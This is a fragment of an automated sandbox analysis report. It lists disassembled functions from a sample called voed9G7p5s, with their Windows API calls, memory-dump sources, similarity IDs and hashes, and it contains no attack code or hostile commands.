                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
                                                                                                    • GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                    • Opcode ID: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
                                                                                                    • Instruction ID: 6d8d20dedbfe1e4f066da477577be421b38fbdc906e8da6606301083a00e90be
                                                                                                    • Opcode Fuzzy Hash: e3db9b6119b0eeb642ba5b3e191076da74f5e1f323a96bd9a3f6b62759bc327b
                                                                                                    • Instruction Fuzzy Hash: 2BE04670910746AECB309B79994DF42BED56F04714F14A82DE0DAF3AA0DAB9D5C4CB50
                                                                                                    Function 00E22BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252061734-0
                                                                                                    • Opcode ID: 455464972391342043e41ccc65fdb1ae1b4ec13b5bf787e2deb0d68b2176cbe2
                                                                                                    • Instruction ID: 1ccc4c217c272472457b5ba1164b07ed721ed86385e3500120c37386fba54252
                                                                                                    • Opcode Fuzzy Hash: 455464972391342043e41ccc65fdb1ae1b4ec13b5bf787e2deb0d68b2176cbe2
                                                                                                    • Instruction Fuzzy Hash: D451E172600222BFDB298F14F846BAAB7A4FF54314F24552DEE01772A2D771ED80DB90
                                                                                                    Function 00E2BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
                                                                                                    • _free.LIBCMT ref: 00E2BF95
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
                                                                                                    • Instruction ID: 9538cbda4f816cf5ac23637f7083fb39a5d2d98129fb628dbd3764e7d5f7bd29
                                                                                                    • Opcode Fuzzy Hash: a450837ffa84b31decd24988e4e6048812ec9721113178e9b98c688146bc967f
                                                                                                    • Instruction Fuzzy Hash: E8017172706A257F332116777D4DCBB6B6EEEC2BA53151129F904F2141EF608D0195B0
                                                                                                    Function 00E29869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00E291AD,00E2B188,?,00E29813,00000001,00000364,?,00E240EF,?,?,00E41098), ref: 00E2986E
                                                                                                    • _free.LIBCMT ref: 00E298A3
                                                                                                    • _free.LIBCMT ref: 00E298CA
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E298D7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E298E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
                                                                                                    • Instruction ID: e49ffa85e405b5d52973c434bbe5bddba4884a40cac5e159ff9787b413067cd3
                                                                                                    • Opcode Fuzzy Hash: 83c815d0a503b2cc08a871980e44f0afd9feeed17220acda344b4f7e0dd94a21
                                                                                                    • Instruction Fuzzy Hash: 960121321407356B821E2335BC89D1A2AAAAFC2374B293039F501B22A3EE308C0A4220
                                                                                                    Function 00E10EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E111CF: ResetEvent.KERNEL32(?), ref: 00E111E1
                                                                                                      • Part of subcall function 00E111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00E111F5
                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00E10F21
                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00E10F3B
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00E10F54
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E10F60
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E10F6C
                                                                                                      • Part of subcall function 00E10FE4: WaitForSingleObject.KERNEL32(?,000000FF,00E11101,?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FEA
                                                                                                      • Part of subcall function 00E10FE4: GetLastError.KERNEL32(?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1868215902-0
                                                                                                    • Opcode ID: 27eba0756b73f47e433df9e77d75f97b8e4cfa37b53f77ca9be7e766235cf110
                                                                                                    • Instruction ID: b127c160c7545fe99bee5587f7a876987c8b41e813808bccf59be91c8d65e1b3
                                                                                                    • Opcode Fuzzy Hash: 27eba0756b73f47e433df9e77d75f97b8e4cfa37b53f77ca9be7e766235cf110
                                                                                                    • Instruction Fuzzy Hash: 59015275500744EFC7269B65DC89FC6FBE9FB08711F000929F25AA2161CBB57A85CA50
                                                                                                    Function 00E2C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E2C817
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2C829
                                                                                                    • _free.LIBCMT ref: 00E2C83B
                                                                                                    • _free.LIBCMT ref: 00E2C84D
                                                                                                    • _free.LIBCMT ref: 00E2C85F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
                                                                                                    • Instruction ID: 2048265e0d9cbedab32ef23a90a388473bd9003fb12c0262e51d7b1954bec660
                                                                                                    • Opcode Fuzzy Hash: ed72682eb0c8efdd11b4c07983fe8012124364abb6e66f8ee72d7a19bd50cef0
                                                                                                    • Instruction Fuzzy Hash: 63F0FF32505224AF9628DB6AF989C1B77EDAB007187747C19F108F76A2CB70FC848A54
                                                                                                    Function 00E11FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E11FE5
                                                                                                    • _wcslen.LIBCMT ref: 00E11FF6
                                                                                                    • _wcslen.LIBCMT ref: 00E12006
                                                                                                    • _wcslen.LIBCMT ref: 00E12014
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397213944-0
                                                                                                    • Opcode ID: 264cb5afcd96392fdb6429b03c763a2e7e637fce1dc852259bdfbe81f4390e26
                                                                                                    • Instruction ID: 2be8842d44df7910989d25a023df53781a85ff41c01b7745073aab372747ed01
                                                                                                    • Opcode Fuzzy Hash: 264cb5afcd96392fdb6429b03c763a2e7e637fce1dc852259bdfbe81f4390e26
                                                                                                    • Instruction Fuzzy Hash: B8F06232008124BFCF221F61EC09DCE3F26DB44760B159009F6156E062CB72DAA5DA90
                                                                                                    Function 00E115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _swprintf
                                                                                                    • String ID: %ls$%s: %s
                                                                                                    • API String ID: 589789837-2259941744
                                                                                                    • Opcode ID: 75c159da75662d5a3c873c4f1259f7d6b9d135aeb16f02364b5e3270a4fdcdd2
                                                                                                    • Instruction ID: 92d90a951aca3e050b924e6f0b1b931c27df2582e60dc7ed1012ee45d0e2e4fc
                                                                                                    • Opcode Fuzzy Hash: 75c159da75662d5a3c873c4f1259f7d6b9d135aeb16f02364b5e3270a4fdcdd2
                                                                                                    • Instruction Fuzzy Hash: 77512775288300FAF6251AA08D46FF576A5AB05B04F24E9C7F387744E1C9A3A4D0A71B
                                                                                                    Function 00E231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E231FB
                                                                                                    • _abort.LIBCMT ref: 00E23306
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer_abort
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 948111806-2084237596
                                                                                                    • Opcode ID: c85d463cc53c56c4b695865388738ed18f4b8cd8bf721421a94f5065a25200a0
                                                                                                    • Instruction ID: d3b21f913b9c79d9f7886744d1d2e36e35f027ae0816904f293ffc0bfe13373b
                                                                                                    • Opcode Fuzzy Hash: c85d463cc53c56c4b695865388738ed18f4b8cd8bf721421a94f5065a25200a0
                                                                                                    • Instruction Fuzzy Hash: 7E415A72900129EFCF16DFA4ED81AAEBBB5BF48304F149059FA0476261D739AA50DF50
                                                                                                    Function 00E07401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E07406
                                                                                                      • Part of subcall function 00E03BBA: __EH_prolog.LIBCMT ref: 00E03BBF
                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00E074CD
                                                                                                      • Part of subcall function 00E07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E07AAB
                                                                                                      • Part of subcall function 00E07A9C: GetLastError.KERNEL32 ref: 00E07AF1
                                                                                                      • Part of subcall function 00E07A9C: CloseHandle.KERNEL32(?), ref: 00E07B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                    • API String ID: 3813983858-639343689
                                                                                                    • Opcode ID: d4af76c25a1b9a1aefe45bd8eb73d11a558300c833fe3e9bb4a19c4397bb87cc
                                                                                                    • Instruction ID: adf0acc35e07a0ff4591d750791b4fa62b3beb6e49bc7f08cb16a949a2bbe112
                                                                                                    • Opcode Fuzzy Hash: d4af76c25a1b9a1aefe45bd8eb73d11a558300c833fe3e9bb4a19c4397bb87cc
                                                                                                    • Instruction Fuzzy Hash: 05319071E04258AEDF21ABA4DC45BEE7BB9AB45304F046056F885B72C2C7749AC8CB61
                                                                                                    Function 00E1AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1AD98
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00E1ADAD
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1ADC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
